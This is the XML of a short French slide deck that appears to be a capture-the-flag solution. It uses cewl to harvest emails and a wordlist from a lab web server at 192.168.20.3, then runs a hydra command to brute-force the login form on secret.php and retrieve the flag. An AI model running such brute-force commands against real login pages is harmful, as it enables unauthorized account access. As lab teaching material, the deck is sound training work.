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252E8-DB9B-BAA2-A503-3D8D93B5A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3B96CA-5006-F3A9-C4E1-E364E12E7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C548AF-CAC5-30F6-945D-C98E5E0B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824A-D759-4266-94C8-3D1A556F30C9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09E3F2-3AE5-7014-CAE8-7AD5B536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5E95C7-6111-94CF-4F42-FC121F87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17E4-BD28-4D39-B8A4-D0F7BD127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36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A3009A-2BA1-402A-DEEE-AC39B2D0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E31C3D-8232-1EDC-B495-78E3D99A0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86BFBE-C63C-EC33-F89E-F489DBDE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824A-D759-4266-94C8-3D1A556F30C9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1BB8D4-F576-F45A-27F0-0DE307A9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52D7C4-B09F-8944-8137-8942DB99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17E4-BD28-4D39-B8A4-D0F7BD127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16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3B6021F-BEB4-E7FB-7CF0-9E915322E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40DE05-581E-D17A-F664-349F29D45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F51689-216A-3E29-3BD8-BEC16681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824A-D759-4266-94C8-3D1A556F30C9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109976-01FA-12BD-0A6A-575F79BB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7CC666-982F-EFFC-2621-95E030D2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17E4-BD28-4D39-B8A4-D0F7BD127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38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6693E-7774-1785-F0AF-61A0A2B5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276B98-9DDE-7567-B378-1C16678FC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90946E-0945-B148-8E42-C0DC058C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824A-D759-4266-94C8-3D1A556F30C9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CBC7BA-A70C-9260-2710-D641C9EC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25CAD8-03ED-95A4-74B3-BC8CDB1D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17E4-BD28-4D39-B8A4-D0F7BD127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75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412C3-BAF3-9AFA-3A8B-6A444C41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FC0F02-5F9D-99B1-ED16-251E7A4F0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5061FE-9804-E687-EA3A-C4F0CAC5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824A-D759-4266-94C8-3D1A556F30C9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2037E5-8816-B7CA-2871-46C5E54A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C1C4D2-F105-B181-1FD6-BF3AAD04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17E4-BD28-4D39-B8A4-D0F7BD127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42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80A3A4-5CDC-D737-B92B-08789459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004907-A770-6BF1-90D0-645EA8460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22EF72-1058-4C34-643C-7EEDF827D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878D71-FBF0-E5F7-94A3-6DDCCA4D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824A-D759-4266-94C8-3D1A556F30C9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966F29-288A-0A99-1A2F-B4CA73D9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2F95E4-DB0B-CF68-CDF0-4BC9F0C9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17E4-BD28-4D39-B8A4-D0F7BD127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44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45A23-75C0-D6B7-0D4C-E25818DF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E188A1-7E74-D47E-71A9-886878FBB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E32278-1FCB-4641-B763-800E683AA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EABBED-B255-413A-0073-2C4121499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D812E7-472E-D597-2864-99ECD0F40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0413F4-AEED-B34C-D62A-471051F1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824A-D759-4266-94C8-3D1A556F30C9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88076BA-0968-DEE2-9AD1-E85F284F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3F82FB-0E6B-D5E3-86D3-22D76620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17E4-BD28-4D39-B8A4-D0F7BD127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7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108E48-F3A4-5A6C-39D8-E69643A2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7A2557D-61D6-1945-66D0-71F0B158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824A-D759-4266-94C8-3D1A556F30C9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E95270-B6C3-EE23-D32F-58BE49C7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A2224D-A45F-61AE-9725-2711B8F5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17E4-BD28-4D39-B8A4-D0F7BD127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01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E2EC4F8-3616-2CDF-0AFF-845A9529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824A-D759-4266-94C8-3D1A556F30C9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C1DBFC-FC64-4479-23D6-C9C70990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82E5FB-77B0-1F03-1CFE-A7BDBBB2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17E4-BD28-4D39-B8A4-D0F7BD127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87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F4134E-20F0-E50E-7639-1E7D0CE44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1A9919-4865-018A-129B-9A8D51ADB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34D69F-C928-361E-5A86-3691A1A53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5FFF5F-E56A-A0E2-B2AE-8D8EE755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824A-D759-4266-94C8-3D1A556F30C9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691190-AB45-0626-0E17-9993A9C4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9521FD-E788-CA9D-7D77-C0C8A4C0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17E4-BD28-4D39-B8A4-D0F7BD127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97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0DFAE-C5F5-0BD4-A921-CF3F2092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8DAA354-6EC8-3DAC-0E6E-9661AD783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4E5501-DD40-7E63-8B50-D797D334B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270646-7C99-A796-30B6-04103BA7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824A-D759-4266-94C8-3D1A556F30C9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840BBB-A342-99F4-AC1E-88E1B75A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5F3C24-C7A3-BB4E-AE3E-D3E87920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17E4-BD28-4D39-B8A4-D0F7BD127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56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64C648-B153-5719-2D0E-CE2D9831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9FF77E-61BD-1353-30B5-D96E1ED73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3231F1-80BF-0D1D-A3E5-15F291A0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5824A-D759-4266-94C8-3D1A556F30C9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CDD371-70C9-4BD8-1438-B4421AEDB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B61F9B-3810-AB6F-FF11-A617E2D9C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A17E4-BD28-4D39-B8A4-D0F7BD127A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03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92.168.20.3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CD95B-3456-C648-A747-3B2824704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Solution challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>CeWL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880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CA927-852B-5E57-B885-B805D5AE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docker-compose up --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>build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5A3C9-3AD2-2E51-D722-8EC895215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récupère le fichier docker-compose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On l’exécute avec le commande ci-dessus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On accède ensuite à la machine avec l’outil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>cewl</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> –ti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>cewl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>bash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917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5E33D-B671-E229-76C6-0A60BF06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cewl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.20.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> –e –n –w email.txt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>cewl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.20.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> –w wordlist.txt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F9F25BA-1CBB-F96C-B255-26C1CC10E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036" y="2138052"/>
            <a:ext cx="9044982" cy="294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5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9E18E-48DD-4050-8702-6DEECA53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hydra -L email.txt -P wordlist.txt 192.168.20.3 http-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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F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"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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secret.php:email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=^USER^&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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=^PASS^:F=incorrect" -V</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2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8A786A-D0AA-B22D-FE05-9DCAEF716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fr-FR" dirty="0"/>
              <a:t>Brute force de la page de connexion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C2795E3-77DE-EDDF-CB79-777D9EC8A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06" y="2982360"/>
            <a:ext cx="8740897" cy="176799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27FEAC1-609F-8827-CD16-6897A3883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221" y="2294365"/>
            <a:ext cx="2619986" cy="314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7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45454-B04B-900B-BFDE-2C3C3BFA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http://192.168.20.3/secret.php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F64B8B-F994-A5D7-5293-F2D7025AB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27839" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>On se connecte avec les identifiants obtenus avec hydra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Un fois connecté, on obtient le flag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549147-1BFC-06A8-80FE-BF593AC2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689" y="2131888"/>
            <a:ext cx="2856198" cy="341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604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Grand écran</PresentationFormat>
  <Paragraphs>12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Solution challenge CeWL</vt:lpstr>
      <vt:lpstr>docker-compose up --build</vt:lpstr>
      <vt:lpstr>cewl http://192.168.20.3 –e –n –w email.txt cewl http://192.168.20.3 –w wordlist.txt</vt:lpstr>
      <vt:lpstr>hydra -L email.txt -P wordlist.txt 192.168.20.3 http-get-form "/secret.php:email=^USER^&amp;password=^PASS^:F=incorrect" -V</vt:lpstr>
      <vt:lpstr>http://192.168.20.3/secret.php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challenge CeWL</dc:title>
  <dc:creator>Arthur WANG</dc:creator>
  <cp:lastModifiedBy>Arthur WANG</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-11T12:29:08Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-11T12:29:21Z</dcterms:modified>
</cp:coreProperties>
</file>